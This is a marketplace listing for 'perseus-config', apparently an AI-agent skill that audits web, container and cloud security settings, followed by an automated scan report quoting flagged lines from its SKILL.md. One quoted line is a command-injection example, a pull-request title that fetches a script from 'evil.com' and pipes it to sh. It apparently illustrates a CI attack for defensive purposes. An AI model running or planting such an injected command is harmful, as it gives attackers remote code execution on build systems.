perseus-config
Analyzes security configurations for web applications, containers, and cloud environments to ensure best practices and vulnerability prevention.
Install this skill
or
24/100
Security score
The perseus-config skill was audited on Mar 1, 2026 and we found 10 security issues across 2 threat categories, including 1 critical. Review the findings below before installing.
Categories Tested
Security Issues
medium line 215
Template literal with variable interpolation in command context
SourceSKILL.md
| 215 | ```yaml |
medium line 497
Template literal with variable interpolation in command context
SourceSKILL.md
| 497 | ```yaml |
medium line 505
Template literal with variable interpolation in command context
SourceSKILL.md
| 505 | ```yaml |
high line 502
Piping content to sh shell
SourceSKILL.md
| 502 | **Attack:** Attacker creates PR with title: `"; curl evil.com/shell.sh | sh #` |
critical line 291
Access to AWS credentials directory
SourceSKILL.md
| 291 | - `.aws/` configs |
low line 197
Access to .env file
SourceSKILL.md
| 197 | COPY .env /app/.env |
medium line 458
Access to .env file
SourceSKILL.md
| 458 | * "Check .env files and environment variable handling." |
medium line 461
Access to .env file
SourceSKILL.md
| 461 | - .env files in repository |
medium line 462
Access to .env file
SourceSKILL.md
| 462 | - Secrets in .env.example |
medium line 463
Access to .env file
SourceSKILL.md
| 463 | - Missing .env in .gitignore |
Scanned on Mar 1, 2026
View Security DashboardInstall this skill with one command
/learn @kaivyy/configGitHub Stars 31
Rate this skill
Categorydevelopment
UpdatedMarch 29, 2026
openclawdevopsbackendsecurity-engineerdevops-srebackend-developerdata-engineertechnical-pmdockerkubernetesawsgcpazureterraformgitlabgithubdevelopmentproduct
kaivyy/perseus